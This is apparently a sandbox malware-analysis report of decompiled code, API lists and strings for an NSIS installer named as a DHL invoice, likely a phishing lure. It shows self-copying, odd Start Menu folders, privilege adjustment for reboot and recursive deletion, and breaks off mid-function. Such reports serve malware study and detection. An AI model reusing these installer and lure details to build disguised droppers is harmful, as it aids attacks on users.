									 *0x42b800 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t195 = 0x1a;
									do {
										E004062A6(_t150, _t171, 0x420ea8, 0x420ea8,  *((intOrPtr*)( *0x42a214 + 0x120)));
										DeleteFileW(0x420ea8);
										if( *(_t196 + 0x10) != _t150 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\DHL-INVOICE-MBV.exe", 0x420ea8, 1) != 0) {
											E0040604A(_t155, 0x420ea8, _t150);
											E004062A6(_t150, _t171, 0x420ea8, 0x420ea8,  *((intOrPtr*)( *0x42a214 + 0x124)));
											_t102 = E0040586D(0x420ea8);
											if(_t102 != _t150) {
												CloseHandle(_t102);
												 *(_t196 + 0x10) = _t150;
											}
										}
										 *0x42b800 =  *0x42b800 + 1;
										_t195 = _t195 - 1;
									} while (_t195 != 0);
									E0040604A(_t155, _t171, _t150);
								}
								goto L48;
							}
							 *_t183 = _t150;
							_t184 =  &(_t183[2]);
							if(E00405C61(_t235,  &(_t183[2])) == 0) {
								goto L48;
							}
							E00406284(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\unclinical", _t184);
							E00406284(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\unclinical\\Mystificerede5\\Montia\\Sbeskummet\\Gtevielsers22", _t184);
							 *(_t196 + 0x10) = _t150;
							goto L47;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t158 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t119 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t163 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
						while( *_t183 != _t158 || _t183[1] != _t119) {
							_t183 = _t183;
							if(_t183 >= _t192) {
								continue;
							}
							break;
						}
						_t150 = 0;
						goto L44;
					}
					GetWindowsDirectoryW(_t171, 0x3fb);
					lstrcatW(_t171, L"\\Temp");
					_t122 = E00403328(_t154, _t224);
					_t225 = _t122;
					if(_t122 != 0) {
						goto L36;
					}
					GetTempPathW(0x3fc, _t171);
					lstrcatW(_t171, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t171);
					SetEnvironmentVariableW(L"TMP", _t171);
					_t127 = E00403328(_t154, _t225);
					_t226 = _t127;
					if(_t127 == 0) {
						goto L48;
					}
					goto L36;
				} else {
					do {
						_t153 = 0x20;
						if(_t65 != _t153) {
							L13:
							if( *_t154 == 0x22) {
								_t154 = _t154 + 2;
								_t153 = 0x22;
							}
							if( *_t154 != 0x2f) {
								goto L27;
							} else {
								_t154 = _t154 + 2;
								if( *_t154 == 0x53) {
									_t147 =  *((intOrPtr*)(_t154 + 2));
									if(_t147 == 0x20 || _t147 == 0) {
										 *0x42a2c0 = 1;
									}
								}
								asm("cdq");
								asm("cdq");
								_t168 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t174 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t168;
								if( *_t154 == (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t168) &&  *((intOrPtr*)(_t154 + 4)) == _t174) {
									_t146 =  *((intOrPtr*)(_t154 + 8));
									if(_t146 == 0x20 || _t146 == 0) {
										 *(_t196 + 0x1c) =  *(_t196 + 0x1c) | 0x00000004;
									}
								}
								asm("cdq");
								asm("cdq");
								_t163 = L" /D=" & 0x0000ffff;
								asm("cdq");
								_t177 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t163;
								if( *(_t154 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t163) ||  *_t154 != _t177) {
									goto L27;
								} else {
									 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
									__eflags = _t154;
									E00406284(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\unclinical", _t154);
									L32:
									_t150 = 0;
									goto L33;
								}
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t154 = _t154 + 2;
						} while ( *_t154 == _t153);
						goto L13;
						L27:
						_t154 = E00405B86(_t154, _t153);
						if( *_t154 == 0x22) {
							_t154 = _t154 + 2;
						}
						_t65 =  *_t154;
					} while (_t65 != 0);
					goto L32;
				}
				L4:
				E004065EE(_t178); // executed
				_t178 =  &(_t178[lstrlenA(_t178) + 1]);
				if( *_t178 != 0) {
					goto L4;
				} else {
					E0040665E(0xa);
					 *0x42a204 = E0040665E(8);
					_t56 = E0040665E(6);
					if(_t56 != _t150) {
						_t56 =  *_t56(0x1e);
						if(_t56 != 0) {
							 *0x42a20f =  *0x42a20f | 0x00000040;
						}
					}
					goto L8;
				}
			}

0x00403364
0x00403365
0x0040336c
0x00403370
0x00403378
0x0040337c
0x00403388
0x00403391
0x00403396
0x00403399
0x004033a0
0x004033a7
0x004033a7
0x004033a0
0x004033a9
0x004033a9
0x004033f1
0x004033f2
0x004033f9
0x004033ff
0x00403415
0x00403425
0x0040342a
0x00403430
0x00403437
0x00403444
0x0040344e
0x00403450
0x00403454
0x00403459
0x00403459
0x00403468
0x0040346a
0x0040346e
0x00403474
0x0040358b
0x00403591
0x0040359c
0x0040359e
0x004035a3
0x004035a5
0x004035fd
0x00403602
0x0040360c
0x00403613
0x00403617
0x004036c8
0x004036c8
0x004036cd
0x004036d3
0x004036d8
0x004037fe
0x00403804
0x00403882
0x00403882
0x00403887
0x0040388a
0x0040388c
0x0040388c
0x00403894
0x00403894
0x00403814
0x0040381a
0x0040381c
0x00403829
0x0040383c
0x00403844
0x0040384c
0x0040384c
0x00403854
0x00403859
0x00403860
0x0040386e
0x00403871
0x00403877
0x00403879
0x00000000
0x00000000
0x00000000
0x00403862
0x00403868
0x0040386a
0x0040386c
0x0040387b
0x0040387d
0x00000000
0x0040387d
0x00000000
0x0040386c
0x00403860
0x004036e7
0x004036ee
0x004036ee
0x00403623
0x004036b8
0x004036b8
0x004036c4
0x00000000
0x004036c4
0x00403630
0x00403634
0x00403682
0x00403682
0x00403684
0x0040368c
0x004036ff
0x00403701
0x00403708
0x00403710
0x00403710
0x0040371b
0x00403720
0x0040372f
0x00403733
0x00403734
0x0040373d
0x00403736
0x00403736
0x00403736
0x00403743
0x00403749
0x00403750
0x00403758
0x00403758
0x00403766
0x00403772
0x00403780
0x00403785
0x0040378b
0x00403797
0x0040379d
0x004037a7
0x004037bd
0x004037ce
0x004037d4
0x004037db
0x004037de
0x004037e4
0x004037e4
0x004037db
0x004037e8
0x004037ef
0x004037ef
0x004037f4
0x004037f4
0x00000000
0x0040372f
0x0040368e
0x00403691
0x0040369c
0x00000000
0x00000000
0x004036a4
0x004036af
0x004036b4
0x00000000
0x004036b4
0x0040363d
0x00403655
0x00403666
0x00403667
0x0040366b
0x0040366d
0x0040367b
0x0040367e
0x00000000
0x00000000
0x00000000
0x0040367e
0x00403680
0x00000000
0x00403680
0x004035ad
0x004035b9
0x004035be
0x004035c3
0x004035c5
0x00000000
0x00000000
0x004035cd
0x004035d5
0x004035e6
0x004035ee
0x004035f0
0x004035f5
0x004035f7
0x00000000
0x00000000
0x00000000
0x0040347a
0x0040347a
0x0040347c
0x00403480
0x00403489
0x0040348d
0x00403492
0x00403493
0x00403493
0x00403498
0x00000000
0x0040349e
0x0040349f
0x004034a4
0x004034a6
0x004034ae
0x004034b5
0x004034b5
0x004034ae
0x004034c6
0x004034d9
0x004034da
0x004034ef
0x004034f4
0x004034f8
0x00403501
0x00403509
0x00403510
0x00403510
0x00403509
0x0040351c
0x0040352f
0x00403530
0x00403545
0x0040354b
0x0040354f
0x00000000
0x00403576
0x00403576
0x0040357b
0x00403584
0x00403589
0x00403589
0x00000000
0x00403589
0x0040354f
0x00000000
0x00000000
0x00000000
0x00403482
0x00403482
0x00403483
0x00403484
0x00000000
0x00403557
0x0040355e
0x00403564
0x00403567
0x00403567
0x00403568
0x0040356b
0x00000000
0x00403574
0x004033ae
0x004033af
0x004033bb
0x004033c2
0x00000000
0x004033c4
0x004033c6
0x004033d4
0x004033d9
0x004033e0
0x004033e4
0x004033e8
0x004033ea
0x004033ea
0x004033e8
0x00000000
0x004033e0

APIs

SetErrorMode.KERNELBASE ref: 0040337C
GetVersion.KERNEL32 ref: 00403382
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033F2
OleInitialize.OLE32(00000000), ref: 004033F9
SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040342A
CharNextW.USER32(00000000,"C:\Users\user\Desktop\DHL-INVOICE-MBV.exe",00000020,"C:\Users\user\Desktop\DHL-INVOICE-MBV.exe",00000000,?,00000006,00000008,0000000A), ref: 00403462

Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040359C
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035AD
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035B9
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CD
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035D5
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E6
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035EE
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403602

Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036CD
ExitProcess.KERNEL32 ref: 004036EE
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403701
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403710
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040371B
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL-INVOICE-MBV.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403727
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403743
DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 0040379D
CopyFileW.KERNEL32(C:\Users\user\Desktop\DHL-INVOICE-MBV.exe,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 004037B1
CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037DE
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040380D
OpenProcessToken.ADVAPI32(00000000), ref: 00403814
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
ExitWindowsEx.USER32(00000002,80040002), ref: 00403871
ExitProcess.KERNEL32 ref: 00403894

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403591, 00403596, 004035AC, 004035B8, 004035C7, 004035D4, 004035E0, 004035E8, 004036FE, 0040370F, 0040371A, 00403726, 00403733, 00403742, 004037F3
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5\Montia\Sbeskummet\Gtevielsers22, xrefs: 004036AA
1033, xrefs: 004035FD
C:\Users\user\Desktop, xrefs: 00403720, 00403725, 00403752
NSIS Error, xrefs: 0040341B
~nsu, xrefs: 004036F9
.tmp, xrefs: 00403715
\Temp, xrefs: 004035B3
C:\Users\user\Desktop\DHL-INVOICE-MBV.exe, xrefs: 004037AC
Error launching installer, xrefs: 00403684
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical, xrefs: 0040357F, 0040369F, 00403749, 00403753
Low, xrefs: 004035CF
"C:\Users\user\Desktop\DHL-INVOICE-MBV.exe", xrefs: 00403430, 00403436, 0040362A
UXTHEME, xrefs: 004033A9, 004033AE, 004033B4
TEMP, xrefs: 004035E1
SeShutdownPrivilege, xrefs: 00403823
TMP, xrefs: 004035E9

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\DHL-INVOICE-MBV.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5\Montia\Sbeskummet\Gtevielsers22$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL-INVOICE-MBV.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-3354012787
Opcode ID: b10d30313cc58dbebad41b8aa72a10871d32026f1935bb576862a9bdc13ee795
Instruction ID: 33263885e95349ea6af21411810ae013db8a0064eb9284cbb984bc5e65c45519
Opcode Fuzzy Hash: b10d30313cc58dbebad41b8aa72a10871d32026f1935bb576862a9bdc13ee795
Instruction Fuzzy Hash: ABD12771200301ABD7207F659D45B3B3AACEB4074AF50487FF881B62E1DB7E8A55876E

Uniqueness

Uniqueness Score: -1.00%

Function 0040542B Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E0040542B(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x4291e4;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E004053BF, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004062A6(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x4236e8;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x4291cc == _t156) {
							ShowWindow( *0x42a208, 8);
							if( *0x42a2ac == _t156) {
								_t119 =  *0x4226c0; // 0x6cb6b4
								E004052EC( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E004041D4(_t171);
							goto L25;
						}
						 *0x421eb8 = 2;
						E004041D4(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00404262(_a8, _a12, _a16);
						}
						ShowWindow( *0x4291d0, _t156);
						ShowWindow(_t169, 8);
						E00404230(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a214;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x4291d0 = GetDlgItem(_a4, 0x403);
				 *0x4291c8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x4291e4 = _t134;
				_v8 = _t134;
				E00404230( *0x4291d0);
				 *0x4291d4 = E00404B89(4);
				 *0x4291ec = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004041FB(_a4);
				if(( *0x42a21c & 0x00000003) != 0) {
					ShowWindow( *0x4291d0, _t156);
					if(( *0x42a21c & 0x00000002) != 0) {
						 *0x4291d0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404230( *0x4291c8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a21c & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x00405433
0x00405439
0x00405443
0x00405446
0x004055dc
0x004055f9
0x00405600
0x00405600
0x00405613
0x00405631
0x00405633
0x0040563b
0x00405691
0x00405695
0x00000000
0x00000000
0x00405697
0x0040569d
0x00000000
0x00000000
0x004056a7
0x004056af
0x004056b2
0x004057b4
0x00000000
0x004057b4
0x004056c1
0x004056cc
0x004056d5
0x004056e0
0x004056e3
0x004056ec
0x004056f2
0x004056f5
0x004056f5
0x0040570d
0x00405716
0x00405719
0x00405720
0x00405727
0x0040572f
0x0040572f
0x00405746
0x00405746
0x0040574d
0x00405753
0x0040575f
0x00405766
0x0040576f
0x00405771
0x00405774
0x00405783
0x00405786
0x0040578c
0x0040578d
0x00405793
0x00405794
0x00405795
0x0040579d
0x004057a8
0x004057ae
0x004057ae
0x00000000
0x0040570d
0x00405643
0x00405673
0x0040567b
0x0040567d
0x00405686
0x00405686
0x0040568c
0x00000000
0x0040568c
0x00405647
0x00405651
0x00000000
0x00405615
0x0040561b
0x00405656
0x00000000
0x0040565f
0x00405624
0x00405629
0x0040562c
0x00000000
0x0040562c
0x00405613
0x0040544c
0x00405450
0x00405458
0x0040545c
0x0040545f
0x00405462
0x00405465
0x00405468
0x00405469
0x0040546a
0x00405483
0x00405486
0x00405490
0x0040549f
0x004054a7
0x004054af
0x004054b4
0x004054b7
0x004054c3
0x004054cc
0x004054d5
0x004054f7
0x004054fd
0x0040550e
0x00405513
0x00405521
0x0040552f
0x0040552f
0x00405534
0x00405542
0x00405542
0x00405547
0x0040554a
0x0040554f
0x0040555b
0x00405564
0x00405571
0x00405580
0x00405573
0x00405578
0x00405578
0x0040558c
0x0040558c
0x004055a0
0x004055a9
0x004055b2
0x004055c2
0x004055ce
0x004055ce
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 00405489
GetDlgItem.USER32(?,000003EE), ref: 00405498
GetClientRect.USER32(?,?), ref: 004054D5
GetSystemMetrics.USER32(00000002), ref: 004054DC
SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405564
ShowWindow.USER32(?,00000008), ref: 00405578
GetDlgItem.USER32(?,000003EC), ref: 00405599
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
GetDlgItem.USER32(?,000003F8), ref: 004054A7

Part of subcall function 00404230: SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E

GetDlgItem.USER32(?,000003EC), ref: 004055EB
CreateThread.KERNEL32(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
CloseHandle.KERNELBASE(00000000), ref: 00405600
ShowWindow.USER32(00000000), ref: 00405624
ShowWindow.USER32(?,00000008), ref: 00405629
ShowWindow.USER32(00000008), ref: 00405673
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
CreatePopupMenu.USER32 ref: 004056B8
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
GetWindowRect.USER32(?,?), ref: 004056EC
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
OpenClipboard.USER32(00000000), ref: 0040574D
EmptyClipboard.USER32 ref: 00405753
GlobalAlloc.KERNEL32(00000042,00000000), ref: 0040575F
GlobalLock.KERNEL32(00000000), ref: 00405769
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
GlobalUnlock.KERNEL32(00000000), ref: 0040579D
SetClipboardData.USER32(0000000D,00000000), ref: 004057A8
CloseClipboard.USER32 ref: 004057AE

Strings

6B, xrefs: 00405719
{, xrefs: 00405691

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {$6B
API String ID: 590372296-3705917127
Opcode ID: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
Instruction ID: 3049cebfab52017954bd75dac417762e958ea911a39284ee9670f095a09d9852
Opcode Fuzzy Hash: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
Instruction Fuzzy Hash: BAB13970900609FFEF119FA1DD89AAE7B79EB04354F40403AFA45AA1A0CB754E52DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00405996 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405996(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405C61(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2a8 =  *0x42a2a8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406284(0x4256f0, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405BA5(_t68);
					} else {
						lstrcatW(0x4256f0, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x4256f0,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406284(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E0040594E(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004052EC(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2a8 =  *0x42a2a8 + 1;
										} else {
											E004052EC(0xfffffff1, _t68);
											E0040604A(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405996(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x4256f0 - 0x5c;
					if( *0x4256f0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E004065C7(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405B59(_t68);
